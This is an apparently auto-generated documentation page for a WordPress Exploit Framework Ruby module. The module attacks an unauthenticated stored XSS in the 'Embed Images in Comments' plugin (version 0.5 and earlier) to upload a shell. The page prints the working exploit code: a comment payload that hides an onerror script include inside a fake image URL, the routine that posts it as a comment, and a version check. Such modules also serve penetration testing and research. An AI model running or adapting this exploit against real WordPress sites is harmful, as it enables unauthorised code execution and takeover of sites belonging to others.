class Wpxf::Exploit::EmbedCommentImagesStoredXssShellUpload
Attributes
comment_id[RW]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb, line 7 def initialize super update_info( name: 'Embed Images in Comments <= 0.5 Unauthenticated Stored XSS Shell Upload', author: [ 'Gennady', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8891'] ], date: 'Aug 17 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('embed-comment-images', '0.6') end
comment_payload()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb, line 31 def comment_payload "http://#{Utility::Text.rand_alpha(5)}.jpg\"onerror=\"#{xss_ascii_encoded_include_script}\".jpg" end
store_payload_in_comment()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb, line 35 def store_payload_in_comment self.comment_id = post_wordpress_comment( datastore['comment_post_id'], "#{datastore['comment_content']}#{comment_payload}", datastore['comment_author'], datastore['comment_email'], datastore['comment_website'] ) end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb, line 45 def store_script store_payload_in_comment # Craft a dummy HttpResponse to indicate success. res = Wpxf::Net::HttpResponse.new(nil) res.code = comment_id == -1 ? 404 : 200 emit_error('Failed to post comment', true) if comment_id == -1 res end
vulnerable_page()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/embed_comment_images_stored_xss_shell_upload.rb, line 27 def vulnerable_page "#{full_uri}?p=#{datastore['comment_post_id']}#comment-#{comment_id}" end